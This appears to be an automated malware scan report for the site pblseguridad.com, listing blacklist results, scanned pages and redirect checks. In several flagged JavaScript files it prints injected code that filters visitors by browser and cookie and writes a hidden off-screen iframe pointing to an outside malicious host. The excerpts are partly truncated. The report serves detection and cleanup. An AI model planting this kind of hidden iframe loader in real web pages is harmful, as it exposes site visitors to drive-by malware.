Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pblseguridad.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pblseguridad.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.pblseguridad.com/ | 200 OK Content-Length: 17529 Content-Type: text/html | clean |
http://www.pblseguridad.com/media/system/js/caption.js | 200 OK Content-Length: 6762 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://www.pblseguridad.com/media/system/js/tabs.js | 200 OK Content-Length: 7103 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u }, hideAllBut: function(but){ for (var i = 0, l = this.titles.length; i < l; i++){ if (i != but) this.fireEvent('onBackground', [this.titles[i], this.descriptions[i]]) } }, display: function(i){ this.hideAllBut(i); this.fireEvent('onActive', [this.titles[i], this.descriptions[i]]) } }); JTabs.implement(new Events); JTabs.implement(new Options); Antivirus reports:
| ||
http://www.pblseguridad.com/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js | 200 OK Content-Length: 8180 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u link_scroll.injectTop($E('.nsp_links',module)); var long_link_scroll = $E('.nsp_link_scroll2',module); long_link_scroll.setStyle('width','100000px'); $ES('.nsp_links ul.list',module).injectInside(long_link_scroll); var link_scroller = new Fx.Scroll(link_scroll, {duration:$G['animation_speed'], wait:false, wheelStops:false}); } nsp_art_list(0, module, 'top'); Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.pblseguridad.com/nosotros.html | 200 OK Content-Length: 13040 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://www.pblseguridad.com/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 2090 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u if (!httpacc && ru) { document.write('<iframe src="http://pirdolian.yangontaxiyellowcab.com/nunatrudel15.html?" style="position:absolute;border-style:solid;border-left-style:dotted;top:-900px;background-color:yellow;cursor:move;left:-900px;" height="134" width="134"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="rightmools=1; path=/; expires="+date.toUTCString(); } } Replacecountermine(); Antivirus reports:
| ||
http://www.pblseguridad.com/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 8189 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u Antivirus reports:
| ||
http://www.pblseguridad.com/seguridad.html | 200 OK Content-Length: 11691 Content-Type: text/html | clean |
http://www.pblseguridad.com/servicios.html | 200 OK Content-Length: 15689 Content-Type: text/html | clean |
http://www.pblseguridad.com/cobertura.html | 200 OK Content-Length: 10424 Content-Type: text/html | clean |
http://www.pblseguridad.com/blog.html | 200 OK Content-Length: 11995 Content-Type: text/html | clean |
http://www.pblseguridad.com/contacto.html | 200 OK Content-Length: 13308 Content-Type: text/html | clean |
http://www.pblseguridad.com/components/com_mad4joomla/js/balloontip/bubble-tooltip.js | 200 OK Content-Length: 6565 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u obj.style.display = 'block'; var st = Math.max(document.body.scrollTop,document.documentElement.scrollTop); if(navigator.userAgent.toLowerCase().indexOf('safari')>=0)st=0; var leftPos = e.clientX - 100; if(leftPos<0)leftPos = 0; obj.style.left = leftPos + 'px'; obj.style.top = e.clientY - obj.offsetHeight -1 + st + 'px'; } function hideToolTip() { document.getElementById('bubble_tooltip').style.display = 'no Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pblseguridad.com
Result:
GET / HTTP/1.1
Host: pblseguridad.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pblseguridad.com
Referer: http://www.google.com/search?q=pblseguridad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pblseguridad.com
Referer: http://www.google.com/search?q=pblseguridad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.